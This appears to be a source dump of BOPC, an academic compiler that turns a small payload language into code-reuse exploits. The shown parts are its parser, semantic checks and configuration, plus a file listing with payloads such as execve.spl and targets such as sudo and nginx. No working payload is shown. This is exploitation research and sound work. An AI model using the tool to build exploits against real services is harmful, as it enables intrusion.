        call = find_call(stmt[0][T])

        if not call:
            self.__syn_err( "Function '%s' is not supported" % stmt[0][T], stmt[0][L] )

        # this check is redundant
        self.__multi_re( [stmt[1]] + [stmt[-1]],
            [r'^\($', r'^\)$'],
            ["Expected '(', but found", "Expected ')', but found"]
        )

        args = []
        if len(stmt) - 3 > 0:
            for i in range(2, len(stmt)-1, 2):
                self.__multi_re( [stmt[i]] + [stmt[i+1]],
                    [_reg_, r'^,$' if len(stmt)-2 > i+1 else r'^\)$'],
                    ["Invalid register name", "Unexpected symbol"]
                )

                args.append( int(stmt[i][T][3]) )


        # both syscalls and libcalls have the same calling convention (in x64) so we're good ;)
        # we don't need to distinguish them

        # check if call has the right number of arguments (for non-variadic ones)
        if len(args) != call[1] and call[1] != INFINITY:
            self.__syn_err( "Function '%s' has an invalid number of arguments" %
                    stmt[0][T], stmt[0][L] )

        # check max number of registers (arguments) in calling convention
        maxlen = len(SYSCALL_CC) if find_syscall(stmt[0][T]) else len(LIBCALL_CC)

        if len(args) > maxlen:
           self.__syn_err("SPL supports functions with up to %d arguments" % maxlen, stmt[0][L])


        self.__ir_add( {'type':'call', 'name':stmt[0][T], 'args':args, 'dirty':call[2], 'alt':[]} )



    # ---------------------------------------------------------------------------------------------
    # __stmt_label(): A label has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_label( self, stmt ):
        # check if label is in correct form
        self.__multi_re( stmt, [_var_], ["Invalid label name"] )

        # give a UID to that label
        # Our semantic analysis states that "every label must be followed by a statement". So we
        # set the UID to be equal with the UID of the next statement. This is because labels
        # are pseudo-statements (they're not part of the IR) and we want the jump target to be
        # at the statement after it.
        #
        # (self.__pc points to the current statement, so +_STEP_UP will point to the next)
        self.__label_dict[ stmt[0][T] ] = '@__' + str(self.__pc + _STEP_UP)

        # add a dummy label (needed for slicing during optimization)
        self.__ir_add( {'type':'label'} )



    # ---------------------------------------------------------------------------------------------
    # __stmt_cond(): An conditional jump statement has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_cond( self, stmt ):
        self.__multi_re( stmt,
            [r'^if$', r'^\($', _reg_, _cmpop_, _number_, r'^\)$', r'^goto$', _var_],
            ["Expected 'if', but found",
             "Expected '(', but found",
             "Expected register, but found",
             "Invalid comparison operator",
             "Invalid number",
             "Expected ')', but found",
             "Expected 'goto', but found",
             "Invalid goto target"]
        )

        # When an conditional jump branches to a label that hasn't been declared yet, we add a
        # temporary jump target. After parsing is done, __label_dict will contain all labels,
        # so we can go back and fix missing target.
        self.__ir_add( {'type'   : 'cond',
                        'reg'    : int(stmt[2][T][3]),
                        'op'     : stmt[3][T],
                        'num'    : int(stmt[4][T], 0),
                        'target' : stmt[7][T]} )



    # ---------------------------------------------------------------------------------------------
    # __stmt_jump(): An jump statement (goto) has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_jump( self, stmt ):
        self.__multi_re( stmt,
            [r'^goto$', _var_],
            ["Expected 'goto', but found", "Invalid goto target"]
        )

        self.__ir_add( {'type':'jump', 'target':stmt[1][T]} )



    # ---------------------------------------------------------------------------------------------
    # __stmt_return(): An return statement has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_return( self, stmt ):
        self.__multi_re( stmt,
            [r'^return$', _number_],
            ["Expected 'return', but found", "Invalid return address"]
        )

        self.__ir_add( {'type':'return', 'target':int(stmt[1][T],0)} )



    # ---------------------------------------------------------------------------------------------
    # __do_syntax_parsing(): This is where syntax analysis starts. Function takes as input the SPL
    #       program (expressed as a list of tokens) and checks whether it follows the EBNF.
    #
    # :Arg tokens: A list of all tokens from the SPL program
    # :Ret: None. If a syntax error occurs, an exception will be raised.
    #
    def __do_syntax_parsing( self, tokens ):

        # -------------------------------------------------------------------------------
        # Merge tokens into statements
        # -------------------------------------------------------------------------------
        stmts, stmt = [], []

        for symbol, lineno in tokens:               # for each token
            if symbol != ';' and symbol != ':':     # not a statement delimiter?

                # if a memory read/write is used, make sure that '*' operator is separated
                if re.search(r'^\*__r.*$', symbol):                     
                    stmt.append( ('*', lineno) )
                    stmt.append( (symbol[1:], lineno) )
                else:
                    stmt.append( (symbol, lineno) ) # append it to the current statement

            else:                                   # statement delimiter
                stmts.append(stmt)                  # append statement to the statements list
                stmt = []                           # clear current statement

        if stmt: stmts.append(stmt)                 # push any leftovers to the list


        # The 1st statement should be the function declaration: "void payload() {". However it
        # also contains the 2nd statement (up to the first delimiter). Split this statement.
        stmt = stmts.pop(0)                         # get 1st statement

        if len(stmt) < 5:                           # not the expected size?
            self.__syn_err("Invalid function declaration", stmt[0][L])

        stmts = [stmt[:5], stmt[5:]] + stmts        # split it and push it back


        # -------------------------------------------------------------------------------
        # To keep the code simple, each statement is parsed in its own function. Here,
        # we quickly identify the type of statement and we invoke the right function to
        # further process it.
        # -------------------------------------------------------------------------------
        for stmt in stmts:                          # for each statement
            # function declaration starts with 'void' and ends with '}':
            #   [('void', 1), ('payload', 1), ('(', 1), (')', 1), ('{', 1)]
            #   [('}',10)]
            if re.search(r'^void$', stmt[0][T]) or re.search(r'^}$', stmt[0][T]):
                self.__stmt_program(stmt)

            # Variable assignments start with 'int' or 'string':
            #   [('int', 2), ('a', 2), ('=', 2), ('0x10', 2)]
            elif re.search(r'^int|string$', stmt[0][T]):
                self.__stmt_var(stmt)

            # Register assignments/modifications and memory reads start with '__r':
            #   [('__r0', 4), ('=', 4), ('1', 4)]
            elif re.search(r'^__r.*', stmt[0][T]):
                self.__stmt_reg(stmt)


            # Memory writes start with '*':            
            #  [('*', 14), ('__r1', 14), ('=', 14), ('__r0', 14)]
            elif re.search(r'^\*', stmt[0][T]):
                self.__stmt_memwr(stmt)

            # Labels consist of a single token:
            #   [('LABEL', 5)]
            elif len(stmt) == 1:
                self.__stmt_label(stmt)

            # Calls have a '(' as 2nd token and a ')' as last token:
            #   [('func', 6), ('(', 6), ('__r0', 6), (',', 6), ('__r1', 6), (',', 6), (')', 6)]
            #
            # (we already know that len(stmt) > 1, so we can access stmt[1])
            elif re.search(r'^\($', stmt[1][T]) and re.search(r'^\)$', stmt[-1][T]):
                self.__stmt_call(stmt)

            # Conditional statements start with 'if':
            #   [('if', 7), ('(', 7), ('__r0', 7), ('>', 7), ('=', 7), ('0x0', 7), (')', 7),
            #    ('goto', 7), ('LABEL', 7)]
            elif re.search(r'^if$', stmt[0][T]):
                self.__stmt_cond(stmt)

            # Jump statements start with 'goto':
            #   [('goto', 8), ('LABEL', 8)]
            elif re.search(r'^goto$', stmt[0][T]):
                self.__stmt_jump(stmt)

            # Returns statements start with 'return':
            #   [('return', 9), ('0x4006fe', 9)]
            elif re.search(r'^return$', stmt[0][T]):
                self.__stmt_return(stmt)

            # Othewise we have a syntax error...
            else:
                self.__syn_err("Unknown keyword '%s'" % stmt[0][T], stmt[0][L])



    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                    SEMANTIC ANALYSIS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __fix_jump_targets(): Fix target labels (replace names with pc) for conditional jumps.
    #
    # :Ret: None.
    #
    def __fix_jump_targets( self ):
        dbg_prnt(DBG_LVL_2, "Fixing jump/goto targets...")

        for _, stmt in self.__ir:                   # for each jump statement
            if stmt['type'] == 'cond' or stmt['type'] == 'jump':
                try:
                    # find pc that label belongs to
                    stmt['target'] = self.__label_dict[ stmt['target'] ]
                except KeyError:
                     self.__sem_err("Label '%s' is not declared" % stmt['target'])

        dbg_prnt(DBG_LVL_2, "Done.")



    # ---------------------------------------------------------------------------------------------
    # __do_semantic_checks(): Perform a basic semantic analysis. This function performs a series
    #       of some semantic checks that IR has to pass.
    #
    # :Ret: None. If a semantic error occurs, an exception will be raised.
    #
    def __do_semantic_checks( self ):
        dbg_prnt(DBG_LVL_2, "Semantic analysis started.")


        # --------------------------------=[ CHECK #1 ]=---------------------------------
        # -----------------=[ "A variable can be declared only once" ]=------------------
        #
        # This check is already done in __stmt_var() as it's way easier to do it there.


        # --------------------------------=[ CHECK #2 ]=---------------------------------
        # ----------=[ "An return must be the last statement of the program" ]=----------
        nret = len([s for _, s in self.__ir if s['type'] == 'return'])

        if nret > 1 or nret == 1 and self.__ir[-1][1]['type'] != 'return':
            self.__sem_err("Only one return is allowed and only at the end of the program")


        # --------------------------------=[ CHECK #3 ]=---------------------------------
        # --------------------=[ "A statement must follow a label" ]=--------------------
        #
        # A tricky check. First we check whether the last statement is _not_ a label. Then, we get
        # all statements (we only care about statement type -VARSET, etc) that follow a label
        # (there's always a next statement after a label, because the last statement is not label)
        # and check whether there are labels there.
        #
        if self.__ir[-1][1]['type'] == 'label' or \
           'label' in [self.__ir[i+1][1]['type'] for i, (_, s) in enumerate(self.__ir) \
           if s['type'] == 'label']:
                self.__sem_err("A label must be followed by a statement (labels are not statements)")


        # --------------------------------=[ CHECK #4 ]=---------------------------------
        # -------=[ "A variable/register must be assigned before it gets used" ]=--------
        #
        # Here we "simulate" the IR. When we encounter an assignment, we mark this variable/
        # register. When we use a variable/register, we check if it's marked. Note that this
        # check does not consider the control flow of the program (e.g. conditional jumps and
        # goto).
        #
        tvar, treg = { }, { }                       # temp variable and register tables

        for _, stmt in self.__ir:                   # for each statement (linear sweep)
            
            # -----------------------------------------------------------------
            if stmt['type'] == 'varset':
                for val in stmt['val']:
                    if isinstance(val, tuple):
                        if val[0] in tvar:
                            tvar[ val[0] ] = 1      # mark variable
                        else:
                            self.__sem_err("Variable '%s' referenced before assignment" % val[0])

                # add this after isinstance() check to catch cases like $c := [$c]
                # mark variable (if it's set for 2nd time don't make it 0)
                tvar[ stmt['name'] ] = tvar.get(stmt['name'], 0) * 1

            
            # -----------------------------------------------------------------
            elif stmt['type'] == 'regset':
                if isinstance(stmt['val'], tuple):  # reference of another variable?
                    if stmt['val'][0] in tvar:
                        tvar[ stmt['val'][0] ] = 1  # mark variable
                    else:
                        self.__sem_err("Variable '%s' referenced before assignment" % stmt['val'][0])


                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1

            
            # -----------------------------------------------------------------
            elif stmt['type'] == 'regmod':
                if stmt['reg'] in treg:
                    treg[ stmt['reg'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['reg'])
                   
           
            # -----------------------------------------------------------------
            elif stmt['type'] == 'memrd':
                if stmt['mem'] in treg:
                    treg[ stmt['mem'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['mem'])

                # mark register being set
                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1

                
            # -----------------------------------------------------------------
            elif stmt['type'] == 'memwr':
                if stmt['mem'] in treg:
                    treg[ stmt['mem'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['mem'])

                if stmt['val'] in treg:
                     treg[ stmt['val'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['val'])


            # -----------------------------------------------------------------
            elif stmt['type'] == 'cond':
                if stmt['reg'] in treg:
                    treg[ stmt['reg'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['reg'])


            # -----------------------------------------------------------------
            elif stmt['type'] == 'call':
                for arg in stmt['args']:
                    if arg in treg:
                        treg[ arg ] = 1

                    else:
                        self.__sem_err("Register '__r%d' referenced before assignment" % arg)


        # --------------------------------=[ CHECK #5 ]=---------------------------------
        # -------------------=[ "A variable/register must be used" ]=--------------------
        #
        # Here we check if there are any registers/variables that are unused. This is actually
        # gets calculated on the previous check. If a variable/register is used, the treg/tvar
        # it will be 1. Otherwise it's 0. Note that this is a soft error. Execution doesn't
        # halt when checks fails.
        #        
        for reg, used in treg.iteritems():
            if not used:
               self.__sem_warn("Register '__r%d' is unused" % reg)

        for var, used in tvar.iteritems():
            if not used:
                self.__sem_warn("Variable '%s' is unused" % var)

        del treg
        del tvar


        # -----------------------------=[ OPTIONAL CHECKs ]=-----------------------------
        # There are other checks that we could do as well:
        #   [1]. A label must be referenced
        #   [2]. A variable must be declared only once
        #   ...
        #

        dbg_prnt(DBG_LVL_2, "Semantic analysis completed.")



    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                 MISCELLANEOUS FUNCTIONS                                 '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # _calc_stats(): Collect some statistics regarding generated IR.
    #
    # :Ret: None.
    #
    def _calc_stats( self ):
        # nreal: the number of real statement (those that need a candidate block)
        self.nreal = 0

        for stmt in self:                           # for each statement
            if stmt['type'] not in ['entry', 'varset', 'label', 'jump', 'return']:
                self.nreal += 1

        # nregs contains the number of distinct virtual registers. This is calculated as follows:
        # It iterates over all statements and gets all registers in 'regset' statements (thanks
        # to our semantic analysis, it's not allowed for a 'regmod' to use a register that hasn't
        # been used in a previous 'regset'; thus we only care about 'regset'). Then in counts the
        # distinct registers by transforming the list into a set.
        self.nregs = len( set([s['reg'] for s in self if s['type'] in ['regset', 'memrd']]) )

        # the number of distinct variables. The processing is identical to nregs
        self.nvars = len( set([s['name'] for s in self if s['type'] == 'varset']) )

        # the number of distinct variables that their references are assigned to registers
        self.nregvars = len( set([s['val'][0] for s in self
                                    if s['type'] == 'regset' and isinstance(s['val'], tuple)]) )

        # the number of "free" variables. Free variables are not assigned to any register, so
        # they can be placed at any memory address (due to the AWP)
        self.nfreevars = self.nvars - self.nregvars



    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor.
    #
    # :Arg filename: The SPL source file name
    #
    def __init__( self, filename ):
        self.__prog = filename                      # program's file name is all we need



    # ---------------------------------------------------------------------------------------------
    # __getitem__(): Get i-th statement from IR. Out-of-order statements are groups in the same
    #       list entry, so we cannot find them in O(1) without some auxiliary data struct. For
    #       now we simply do a linear search.
    #
    # :Arg idx: Index of the IR statement
    # :Ret: The requested IR statement
    # 
    def __getitem__( self, idx ):
        assert( idx >= 0 )                          # bound checks

        for _, stmt in self.__ir:                   # for each IR statement list
            # each list has a single element here
            if stmt[0]['uid'] == idx: return stmt   # if index found return statement

        raise IndexError("No statement with uid = %d found" % idx )



    # ---------------------------------------------------------------------------------------------
    # __len__(): Get the number of IR statements.
    #
    # :Ret: Each time function returns a different statement.
    #
    def __len__( self ):
        return len(self.__ir)



    # ---------------------------------------------------------------------------------------------
    # __iter__(): Iterate over all statements. This function is a generator over all statements
    #       (no matter if they are out-of-order or not).
    #
    # :Ret: Each time function returns a different statement.
    #
    def __iter__( self ):
        for _, stmt_r in self.__ir:                 # for each IR statement list
            for stmt in stmt_r:                     # for each "parallel" statement
                yield stmt                          # return next statement



    # ---------------------------------------------------------------------------------------------
    # compile(): Compile the source file into its Intermediate Representation (IR). Make sure that
    #       the file follows the syntax of and the semantics of the SPL.
    #
    # :Ret: None. If an error occurs, program will terminate.
    #
    def compile( self ):
        dbg_prnt(DBG_LVL_1, "Compiling '%s'..." % self.__prog)
        dbg_prnt(DBG_LVL_2, "Parsing started.")

        tokens = []                                 # place all tokens here

        try: 
            with open(self.__prog, "r") as file:    # open source file
                # -----------------------------------------------------------------------
                # Do the lexical analysis here
                # -----------------------------------------------------------------------
                for line in file:                   # process it line by line
                    # drop all comments "//" from current line (be careful though to not
                    # drop "comments" that are inside quotes)
                    line = re.sub("(?!\B\"[^\"]*)\/\/(?![^\"]*\"\B).*\n", '', line)


                    # tokenize line and append it to the token list
                    lexical = shlex.shlex(line)     # create a lexical analysis object

                    # TODO: this is not recognized as comment: //string s2 = "/this";

                    #  lexical.commenters = '//'    # alternative way to drop comments
                    lexical.wordchars += ''.join(set(''.join(asg_ops + cmp_ops) + '+-&'))

                    symbols = [token for token in lexical]
                    if symbols:                     # if there are any tokens

                        # tokens are tuples (symbol, line number)
                        tokens += zip(symbols, [self.__lineno]*len(symbols))

                    self.__lineno = self.__lineno+1 # update line counter

        except IOError:
            fatal("File '%s' not found" % self.__prog)



        self.__do_syntax_parsing(tokens)            # do the syntax analysis

        dbg_prnt(DBG_LVL_2, "Parsing complete.")

        # ===-----
        # At this point, program has a valid syntax. We move on the semantic analysis
        # ===-----

        self.__fix_jump_targets()                   # fix goto branches (label => pc)
        self.__do_semantic_checks()                 # do the semantic checks


        # at this point each statement is the form: [pc, stmt]. This form is not suitable for
        # out of order statements, as we want them in the form: [pc, [stmt1, stmt2, ...]]. This
        # the job of the optimizer, but for now we have to prepare IR accordingly, so we convert
        # each statement into the form: [pc, [stmt]].
        for s in self.__ir: s[1] = [s[1]]

        self._calc_stats()                          # get IR statistics

        dbg_prnt(DBG_LVL_1, "Compilation completed.")



    # ---------------------------------------------------------------------------------------------
    # get_ir(): Return the compiled IR.
    #
    # :Ret: The IR.
    #
    def get_ir( self ):
        return self.__ir



# -------------------------------------------------------------------------------------------------


================================================
FILE: source/config.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# config.py
#
# This is the main configuration file with BOPC options.
#
# NOTE: There are a bunch of minor configuration options, on coreutils.py but there is no reason
#       to modify them.
#
# -------------------------------------------------------------------------------------------------



# -------------------------------------------------------------------------------------------------
# Depth metric for functions (can be 'min', 'max' or 'median')
#  
# Determine the metric for measuring function's depth. This option estimates the minimum number of
# distinct basic blocks that should be executed within a function. To do that, one should look at
# the shortest paths from the entry point to all final basic blocks (those that end with a return
# instruction) and select as depththe length of the minimum of these (shortest) paths ('min' 
# option).
#
# However this metric might not always work that well, as it's very common to make argument checks
# at the very early stages of a function and abort if they do not meet the requirements.
#   
# Hence, we provide 3 metrics: The minimum among the shortest paths that we discussed, the maximum
# ('max' option) and the median of all shortest paths ('median' option).
# 
FUNCTION_DEPTH_METRIC = 'min'



# -------------------------------------------------------------------------------------------------
# When the Symbolic Execution engine gives up on a basic block abstraction (in seconds)
#
ABSBLK_TIMEOUT = 5



# -------------------------------------------------------------------------------------------------
# How many tries we should make before we give up on __enum_induced_subgraphs().
#
# Enumerating all induced subgraphs can take exponential time. To address that we set an upper
# bound. After calculating a fixed number of induced subgraphs, we give up, and we use the 
# best ones up to that point. Set this value to -1 to set the upper bound to infinity.
#
MAX_INDUCED_SUBRAPHS_TRIES = -1
MAX_ALLOWED_INDUCED_SUBGRAPHS = 1024



# -------------------------------------------------------------------------------------------------
# How many times we should permute the OOO SPL statements before we give up. Set to -1 to try all
# possible permutations. This makes sense when 'ooo' optimization is enabled
#
N_OUT_OF_ORDER_ATTEMPTS = 3



# -------------------------------------------------------------------------------------------------
# Trace searching algorithm picks the K shortest paths from Delta Graph (K = PARAMETER_K). However
# there are cases that there are >K paths that are all worth to try. In those cases we keep trying
# paths, as long as their distances are below this threshold.
#
# MAX_GOOD_INDUCED_SUBGRAPH_SIZE = 10 (NOT IMPLEMENTED)
#
PARAMETER_K = 4#10



# -------------------------------------------------------------------------------------------------
# Number of different shortest paths between 2 functional blocks (needed for concolic execution).
# Set to -1 to try all shortest paths
#
PARAMETER_P = 8



# -------------------------------------------------------------------------------------------------
# The actual size of load/store operations for memrd and memwr SPL statements in bytes. This
# parameter can be 1, 2, 4 or 8 bytes.
#
MEMORY_LOADSTORE_SIZE = 1



# -------------------------------------------------------------------------------------------------
# When the Symbolic Execution engine gives up on trace searching (in seconds). That is, when
# the concolic execution gives up on verifying a dispatcher gadget.
#
SE_TRACE_TIMEOUT = 8



# -------------------------------------------------------------------------------------------------
# Maximum length of the final trace (a candidate execution trace cannot have more blocks that this).
#
MAX_ALLOWED_TRACE_SIZE = 100



# -------------------------------------------------------------------------------------------------
# Maximum number of basic blocks in path between 2 accepted blocks (i.e., maximum number of basic
# blocks in a dispatcher).
#
MAX_ALLOWED_SUBPATH_LEN = 40



# -------------------------------------------------------------------------------------------------
# The stack base address (along with $rsp) for symbolic execution.
#
# WARNING: Make sure that RSP doesn't go beyond pa
Download .txt
gitextract_g5a28eqg/

├── README.md
├── evaluation/
│   ├── README.md
│   ├── ghttpd
│   ├── httpd
│   ├── lt-wireshark
│   ├── nginx1
│   ├── nullhttpd
│   ├── opensshd
│   ├── orzhttpd
│   ├── proftpd
│   ├── smbclient
│   ├── sudo
│   └── wuftpd
├── payloads/
│   ├── README.md
│   ├── abloop.spl
│   ├── execve.spl
│   ├── ifelse.spl
│   ├── infloop.spl
│   ├── loop.spl
│   ├── memrd.spl
│   ├── memwr.spl
│   ├── print.spl
│   ├── regmod.spl
│   ├── regref4.spl
│   ├── regref5.spl
│   ├── regset4.spl
│   └── regset5.spl
├── setup.sh
└── source/
    ├── BOPC.py
    ├── README.md
    ├── absblk.py
    ├── calls.py
    ├── capability.py
    ├── compile.py
    ├── config.py
    ├── coreutils.py
    ├── delta.py
    ├── map.py
    ├── mark.py
    ├── optimize.py
    ├── output.py
    ├── path.py
    ├── search.py
    └── simulate.py
Download .txt
SYMBOL INDEX (215 symbols across 14 files)

FILE: source/BOPC.py
  function parse_args (line 58) | def parse_args():
  function load (line 278) | def load( filename ):
  function abstract (line 330) | def abstract( mark, mode, filename ):
  function capability_analyses (line 356) | def capability_analyses( cap ):

FILE: source/absblk.py
  class abstract_ng (line 152) | class abstract_ng( object ):
    method __reg_w (line 163) | def __reg_w( self, state ):
    method __mem_r (line 331) | def __mem_r( self, state ):
    method __mem_w (line 347) | def __mem_w( self, state ):
    method __call (line 409) | def __call( self, state ):
    method __cond (line 453) | def __cond( self, state ):
    method __add_sym_vars (line 612) | def __add_sym_vars( self, addr_expr ):
    method __memread_callback (line 640) | def __memread_callback( self, state ):
    method __regwrite_callback (line 706) | def __regwrite_callback( self, state ):
    method __sig_handler (line 847) | def __sig_handler( self, signum, frame ):
    method __init__ (line 872) | def __init__( self, project, addr ):
    method __getitem__ (line 1119) | def __getitem__( self, what ):
    method __iter__ (line 1142) | def __iter__( self ):

FILE: source/calls.py
  function find_syscall (line 144) | def find_syscall( name ):
  function find_libcall (line 165) | def find_libcall( name ):
  function find_call (line 186) | def find_call( name ):

FILE: source/capability.py
  class capability (line 67) | class capability( object ):
    method __add (line 94) | def __add( self, addr, ty, reg=None, val=None, mode=None, isW=None, op...
    method __init__ (line 122) | def __init__( self, cfg, name ):
    method build (line 145) | def build( self, options=CAP_ALL ):
    method get (line 424) | def get( self ):
    method save (line 434) | def save( self ):
    method explore (line 494) | def explore( self ):
    method analyze (line 586) | def analyze( self, *analyses ):
    method analyze_island (line 614) | def analyze_island( self, addr, *analyses ):
    method callback (line 656) | def callback( self, cbfunc ):
    method __analyze_stmt_comb_ctr (line 671) | def __analyze_stmt_comb_ctr( self, island ):
    method __analyze_stmt_min_dist (line 720) | def __analyze_stmt_min_dist( self, island ):
    method __analyze_loops (line 783) | def __analyze_loops( self, island ):

FILE: source/compile.py
  class compile (line 132) | class compile( object ):
    method __syn_err (line 156) | def __syn_err( self, err, lineno ):
    method __sem_err (line 168) | def __sem_err( self, err ):
    method __sem_warn (line 180) | def __sem_warn( self, msg ):
    method __multi_re (line 195) | def __multi_re( self, stmt, regex, err ):
    method __ir_add (line 215) | def __ir_add( self, tup ):
    method __check_prog_state (line 238) | def __check_prog_state( func ):
    method __stmt_program (line 257) | def __stmt_program( self, stmt ):
    method __stmt_var (line 296) | def __stmt_var( self, stmt ):
    method __stmt_reg (line 378) | def __stmt_reg( self, stmt ):
    method __stmt_memwr (line 437) | def __stmt_memwr( self, stmt ):
    method __stmt_call (line 455) | def __stmt_call( self, stmt ):
    method __stmt_label (line 504) | def __stmt_label( self, stmt ):
    method __stmt_cond (line 529) | def __stmt_cond( self, stmt ):
    method __stmt_jump (line 560) | def __stmt_jump( self, stmt ):
    method __stmt_return (line 577) | def __stmt_return( self, stmt ):
    method __do_syntax_parsing (line 594) | def __do_syntax_parsing( self, tokens ):
    method __fix_jump_targets (line 701) | def __fix_jump_targets( self ):
    method __do_semantic_checks (line 722) | def __do_semantic_checks( self ):
    method _calc_stats (line 884) | def _calc_stats( self ):
    method __init__ (line 923) | def __init__( self, filename ):
    method __getitem__ (line 936) | def __getitem__( self, idx ):
    method __len__ (line 952) | def __len__( self ):
    method __iter__ (line 963) | def __iter__( self ):
    method compile (line 976) | def compile( self ):
    method get_ir (line 1043) | def get_ir( self ):

FILE: source/coreutils.py
  function set_dbg_lvl (line 98) | def set_dbg_lvl( lvl ):
  function to_uid (line 110) | def to_uid( pc ):
  function pretty_list (line 125) | def pretty_list( uglylist, delimiter=' - '):
  function to_edges (line 160) | def to_edges( path, direction='forward' ):
  function mk_reverse_adj (line 178) | def mk_reverse_adj( adj ):
  function disjoint (line 196) | def disjoint( set_a, set_b ):
  function log (line 212) | def log( msg ):
  function now (line 228) | def now():
  function dbg_prnt (line 241) | def dbg_prnt( lvl, msg, pre='[+] ' ):
  function dbg_arb (line 256) | def dbg_arb( lvl, msg, arb, pre='[+] ' ):
  function func_name (line 269) | def func_name ( addr ):
  function fatal (line 284) | def fatal( err ):
  function error (line 297) | def error( err ):
  function warn (line 308) | def warn( warn, lvl=DBG_LVL_0 ):
  function emph (line 322) | def emph( msg, lvl=DBG_LVL_0 , pre='[*] '):
  function bold (line 337) | def bold( num, ty='int', pad=None ):
  function bolds (line 354) | def bolds( string ):
  function rainbow (line 365) | def rainbow( string ):
  class _node_colors (line 410) | class _node_colors( object ):
    method __init__ (line 416) | def __init__( self ):
    method __setitem__ (line 423) | def __setitem__( self, color, nodeset ):
    method __iter__ (line 431) | def __iter__( self ):
    method __contains__ (line 439) | def __contains__( self, node ):
    method get_nodes (line 446) | def get_nodes( self ):
  function __get_dg_layers (line 460) | def __get_dg_layers( delta_graph ):
  function __get_dg_layer_nodes (line 472) | def __get_dg_layer_nodes( delta_graph, layer_id ):
  function visualize (line 500) | def visualize( graph, gtype='', options=VO_NONE, entry=-1, filename=None...

FILE: source/delta.py
  class delta (line 50) | class delta( P._cs_ksp_intrl ):
    method __dijkstra_av (line 65) | def __dijkstra_av( self, src, dst, extra=None ):
    class __maxheap_obj (line 136) | class __maxheap_obj( object ):
      method __init__ (line 137) | def __init__( self, tw, Hk ):           # store total weight and ind...
      method __eq__ (line 140) | def __eq__( self, obj ):                # == operator: Compare total...
      method __lt__ (line 143) | def __lt__( self, obj ):                # < operator: Invert condition
    method __enum_induced_subgraphs (line 164) | def __enum_induced_subgraphs( self, depth, V ):
    method __init__ (line 298) | def __init__( self, graph, entry, accepted, clobbering, adj):
    method k_min_induced_subgraphs (line 590) | def k_min_induced_subgraphs( self, K ):
    method __enum_paths (line 660) | def __enum_paths( self, curr, graph, P, __visited, F=lambda x: x ):
    method flatten_graph (line 706) | def flatten_graph( self, graph ):

FILE: source/map.py
  class _match (line 62) | class _match( object ):
    method __D (line 77) | def __D( self, G, M ):
    method __matchings_iter (line 105) | def __matchings_iter( self, G, M, D ):
    method __max_matchings_recursion (line 222) | def __max_matchings_recursion( self, G, depth, M ):
    method __init__ (line 255) | def __init__( self, graph, mode ):
    method __del__ (line 284) | def __del__( self ):
    method enum_max_matchings (line 295) | def enum_max_matchings( self, callback, n=-1 ):
    method enum_max_matchings_bf (line 359) | def enum_max_matchings_bf( self, callback, n ):
  class map (line 376) | class map( object ):
    method __intrl_callback_var (line 391) | def __intrl_callback_var( self, match ):
    method __intrl_callback_reg (line 407) | def __intrl_callback_reg( self, match ):
    method __init__ (line 445) | def __init__( self, graph, nregs, nvars ):
    method enum_mappings (line 457) | def enum_mappings( self, callback ):

FILE: source/mark.py
  class mark (line 66) | class mark( object ):
    method __blk_cnt (line 78) | def __blk_cnt( self, avoid=[], which='all'):
    method __blk_iter (line 130) | def __blk_iter( self, avoid=[], method='block' ):
    method __reg_filter (line 211) | def __reg_filter( self, reg ):
    method __imm_addr (line 239) | def __imm_addr( self, address, abstr ):
    method __mk_unique (line 263) | def __mk_unique(self, addrstr, sym):
    method __init__ (line 311) | def __init__( self, project, cfg, ir, avoid=[] ):
    method abstract_cfg (line 347) | def abstract_cfg( self ):
    method save_abstractions (line 406) | def save_abstractions( self, filename ):
    method load_abstractions (line 444) | def load_abstractions( self, filename ):
    method mark_candidate (line 492) | def mark_candidate( self, forced_mapping=[] ):
    method mark_accepted (line 1094) | def mark_accepted( self, rmap, vmap ):
    method mark_clobbering (line 1262) | def mark_clobbering( self, rmap, vmap ):
    method __get_stmt_regs (line 1477) | def __get_stmt_regs( self, stmt ):
    method __is_clobbering (line 1497) | def __is_clobbering( self, s1, s2 ):

FILE: source/optimize.py
  class optimize (line 42) | class optimize( C.compile ):
    method __get_stmt_regs (line 53) | def __get_stmt_regs( self, stmt ):
    method __depends (line 83) | def __depends( self, s1, s2 ):
